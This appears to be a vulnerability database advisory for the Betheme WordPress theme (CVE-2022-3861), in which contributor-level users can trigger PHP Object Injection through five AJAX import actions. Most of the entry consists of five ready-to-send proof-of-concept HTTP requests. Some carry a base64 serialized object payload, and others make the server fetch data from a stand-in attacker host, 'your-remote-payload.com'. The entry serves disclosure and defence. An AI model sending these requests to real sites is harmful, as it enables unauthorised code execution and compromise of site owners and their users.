Lucene search
WpvulndbWPEX-ID:7E81BF65-E3E3-452D-BCAC-5954B1BFD4DAHistoryNov 21, 2022 - 12:00 a.m.
Betheme < 26.6 - Contributor+ PHP Object Injection
2022-11-2100:00:00
wpvulndb
212
betheme vulnerability
php object injection
ajax actions
EPSS
0.002
Percentile
61.3%
The plugin unserializes user input provided via the import, mfn-items-import-page, and mfn-items-import parameters passed through the mfn_builder_import, mfn_builder_import_page, importdata, importsinglepage, and importfromclipboard functions. This could allow users with a role as low as contributor to perform PHP Object Injection when a suitable gadget is present
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 75
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [your-auth-cookies]
Connection: close
mfn-builder-nonce=[your-nonce]&action=mfn_builder_import&mfn-items-import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30=
To exploit the "mfn_builder_import_page" ajax action, use:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 123
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [your-auth-cookies]
Connection: close
mfn-builder-nonce=[your-nonce]&action=mfn_builder_import_page&mfn-items-import-page=https://your-remote-payload.com/
To exploit the "importdata" ajax action, use:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 114
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [your-auth-cookies]
Connection: close
mfn-builder-nonce=[your-nonce]&action=importdata&import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30=
To exploit the "importsinglepage" ajax action, use:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 83
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [your-auth-cookies]
Connection: close
mfn-builder-nonce=[your-nonce]&action=importsinglepage&import=https://your-remote-payload.com/
To exploit the "importfromclipboard" ajax action, use:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 123
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [your-auth-cookies]
Connection: close
mfn-builder-nonce=[your-nonce]&action=importfromclipboard&import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30=Related
cvelist
cvelist
CVE-2022-3861
2022-11-21 12:45:46
wpvulndb
wpvulndb
Betheme < 26.6 - Contributor+ PHP Object Injection
2022-11-21 00:00:00
packetstorm
packetstorm
WordPress BeTheme 26.5.1.4 PHP Object Injection
2022-11-21 00:00:00
cve
cve
CVE-2022-3861
2022-11-21 13:15:10
cnvd
cnvd
WordPress Plugin Betheme them plugin deserialization vulnerability
2022-11-23 00:00:00
prion
prion
Deserialization of untrusted data
2022-11-21 13:15:00
nvd
nvd
CVE-2022-3861
2022-11-21 13:15:10
zdt
zdt
WordPress BeTheme 26.5.1.4 PHP Object Injection Vulnerability
2022-11-21 00:00:00